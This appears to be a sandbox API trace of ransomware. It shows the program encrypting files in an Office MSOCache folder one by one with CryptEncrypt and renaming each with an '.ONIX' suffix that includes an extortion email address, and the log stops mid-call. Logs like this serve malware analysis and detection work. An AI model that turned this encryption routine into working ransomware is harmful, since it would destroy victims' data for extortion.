0x425278 [0103.358] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x4588e0 [0103.358] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0103.358] GetLastError () returned 0x0 [0103.358] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dw20.exe"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x488 [0103.359] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0103.359] LockFile (hFile=0x488, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xccb88, nNumberOfBytesToLockHigh=0x0) returned 1 [0103.359] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0103.359] ReadFile (in: hFile=0x488, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0103.361] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0103.361] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0103.361] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0103.361] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0103.361] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE", dwFileAttributes=0x80) returned 1 [0103.361] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE") returned 72 [0103.361] GetProcessHeap () returned 0x410000 [0103.361] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x100) returned 0x4d6b80 [0103.361] lstrcpyW (in: lpString1=0x4d6b80, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE" [0103.362] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0103.362] GetFileSizeEx (in: hFile=0x488, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=838536) returned 1 [0103.362] SetFilePointer (in: hFile=0x488, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0xccb88 [0103.362] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0103.362] GetProcessHeap () returned 0x410000 [0103.362] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d6c88 [0103.362] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d6c88*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d6c88*, pdwDataLen=0x367f414*=0x100) returned 1 [0103.362] WriteFile (in: hFile=0x488, lpBuffer=0x4d6c88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d6c88*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0103.364] WriteFile (in: hFile=0x488, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0103.365] WriteFile (in: hFile=0x488, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0103.366] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xccb88) returned 0xf50020 [0103.366] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xccb88) returned 0x2680020 [0103.366] SetFilePointer (in: hFile=0x488, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.366] ReadFile (in: hFile=0x488, lpBuffer=0xf50020, nNumberOfBytesToRead=0xccb88, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf50020*, lpNumberOfBytesRead=0x367f44c*=0xccb88, lpOverlapped=0x0) returned 1 [0103.402] UnlockFile (hFile=0x488, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xccb88, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0103.402] CloseHandle (hObject=0x488) returned 1 [0103.403] GetProcessHeap () returned 0x410000 [0103.403] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d6c88 | out: hHeap=0x410000) returned 1 [0103.403] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dw20.exe"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dw20.exe.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0103.406] GetProcessHeap () returned 0x410000 [0103.406] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d6b80 | out: hHeap=0x410000) returned 1 [0103.406] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0103.406] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0103.406] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0103.406] FindNextFileW (in: hFindFile=0x48ebf0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xabf60500, ftCreationTime.dwHighDateTime=0x1cac9ae, ftLastAccessTime.dwLowDateTime=0xabf60500, ftLastAccessTime.dwHighDateTime=0x1cac9ae, ftLastWriteTime.dwLowDateTime=0xe85ab8b0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x80760, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dwdcw20.dll", cAlternateFileName="")) returned 1 [0103.406] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0103.406] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0103.406] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x4588e0 [0103.406] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0103.406] GetLastError () returned 0x0 [0103.407] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwdcw20.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x488 [0103.407] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0103.407] LockFile (hFile=0x488, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x80760, nNumberOfBytesToLockHigh=0x0) returned 1 [0103.407] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0103.407] ReadFile (in: hFile=0x488, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0103.411] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0103.411] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0103.411] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0103.411] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0103.411] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll", dwFileAttributes=0x80) returned 1 [0103.411] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll") returned 75 [0103.411] GetProcessHeap () returned 0x410000 [0103.411] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x106) returned 0x467908 [0103.411] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll" [0103.411] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0103.411] GetFileSizeEx (in: hFile=0x488, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=526176) returned 1 [0103.411] SetFilePointer (in: hFile=0x488, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x80760 [0103.411] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0103.412] GetProcessHeap () returned 0x410000 [0103.412] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d6b80 [0103.412] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d6b80*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d6b80*, pdwDataLen=0x367f414*=0x100) returned 1 [0103.412] WriteFile (in: hFile=0x488, lpBuffer=0x4d6b80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d6b80*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0103.413] WriteFile (in: hFile=0x488, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0103.415] WriteFile (in: hFile=0x488, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0103.416] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80760) returned 0xf50020 [0103.416] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80760) returned 0xfe0020 [0103.417] SetFilePointer (in: hFile=0x488, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.417] ReadFile (in: hFile=0x488, lpBuffer=0xf50020, nNumberOfBytesToRead=0x80760, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf50020*, lpNumberOfBytesRead=0x367f44c*=0x80760, lpOverlapped=0x0) returned 1 [0103.439] UnlockFile (hFile=0x488, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x80760, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0103.439] CloseHandle (hObject=0x488) returned 1 [0103.441] GetProcessHeap () returned 0x410000 [0103.441] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d6b80 | out: hHeap=0x410000) returned 1 [0103.441] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwdcw20.dll"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwdcw20.dll.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0103.443] GetProcessHeap () returned 0x410000 [0103.443] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0103.443] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0103.443] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0103.443] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0103.443] FindNextFileW (in: hFindFile=0x48ebf0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xabf60500, ftCreationTime.dwHighDateTime=0x1cac9ae, ftLastAccessTime.dwLowDateTime=0xabf60500, ftLastAccessTime.dwHighDateTime=0x1cac9ae, ftLastWriteTime.dwLowDateTime=0xe85f73a0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x7eda0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dwtrig20.exe", cAlternateFileName="")) returned 1 [0103.443] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0103.443] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0103.443] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x4588e0 [0103.443] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0103.443] GetLastError () returned 0x0 [0103.443] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwtrig20.exe"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x488 [0103.444] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0103.444] LockFile (hFile=0x488, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x7eda0, nNumberOfBytesToLockHigh=0x0) returned 1 [0103.444] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0103.444] ReadFile (in: hFile=0x488, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0103.445] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0103.445] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0103.445] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0103.446] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0103.446] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe", dwFileAttributes=0x80) returned 1 [0103.446] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe") returned 76 [0103.446] GetProcessHeap () returned 0x410000 [0103.446] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x108) returned 0x467908 [0103.446] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe" [0103.446] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0103.446] GetFileSizeEx (in: hFile=0x488, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=519584) returned 1 [0103.446] SetFilePointer (in: hFile=0x488, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x7eda0 [0103.446] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0103.446] GetProcessHeap () returned 0x410000 [0103.446] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d6b80 [0103.446] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d6b80*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d6b80*, pdwDataLen=0x367f414*=0x100) returned 1 [0103.446] WriteFile (in: hFile=0x488, lpBuffer=0x4d6b80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d6b80*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0103.449] WriteFile (in: hFile=0x488, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0103.450] WriteFile (in: hFile=0x488, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0103.450] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x7eda0) returned 0xf50048 [0103.452] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x7eda0) returned 0xfcedf0 [0103.453] SetFilePointer (in: hFile=0x488, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.453] ReadFile (in: hFile=0x488, lpBuffer=0xf50048, nNumberOfBytesToRead=0x7eda0, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf50048*, lpNumberOfBytesRead=0x367f44c*=0x7eda0, lpOverlapped=0x0) returned 1 [0103.465] SetFilePointer (in: hFile=0x488, lDistanceToMove=-519584, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.465] WriteFile (in: hFile=0x488, lpBuffer=0xfcedf0*, nNumberOfBytesToWrite=0x7eda0, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xfcedf0*, lpNumberOfBytesWritten=0x367f44c*=0x7eda0, lpOverlapped=0x0) returned 1 [0103.470] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0xf50048 | out: hHeap=0x410000) returned 1 [0103.470] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0xfcedf0 | out: hHeap=0x410000) returned 1 [0103.474] UnlockFile (hFile=0x488, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x7eda0, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0103.474] CloseHandle (hObject=0x488) returned 1 [0103.476] GetProcessHeap () returned 0x410000 [0103.476] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d6b80 | out: hHeap=0x410000) returned 1 [0103.476] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwtrig20.exe"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwtrig20.exe.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0103.478] GetProcessHeap () returned 0x410000 [0103.478] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0103.478] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0103.478] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0103.478] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0103.478] FindNextFileW (in: hFindFile=0x48ebf0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8d646800, ftCreationTime.dwHighDateTime=0x1cacc53, ftLastAccessTime.dwLowDateTime=0x8d646800, ftLastAccessTime.dwHighDateTime=0x1cacc53, ftLastWriteTime.dwLowDateTime=0xe8728670, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x741, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.VC90.CRT.manifest", cAlternateFileName="MICROS~1.MAN")) returned 1 [0103.478] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0103.478] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0103.478] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x4588e0 [0103.478] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0103.478] GetLastError () returned 0x0 [0103.478] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x488 [0103.479] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0103.479] LockFile (hFile=0x488, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x741, nNumberOfBytesToLockHigh=0x0) returned 1 [0103.480] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0103.480] ReadFile (in: hFile=0x488, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0103.481] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0103.481] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0103.481] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0103.481] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0103.481] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest", dwFileAttributes=0x80) returned 1 [0103.482] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned 91 [0103.482] GetProcessHeap () returned 0x410000 [0103.482] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x126) returned 0x449878 [0103.482] lstrcpyW (in: lpString1=0x449878, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest" [0103.482] lstrcatW (in: 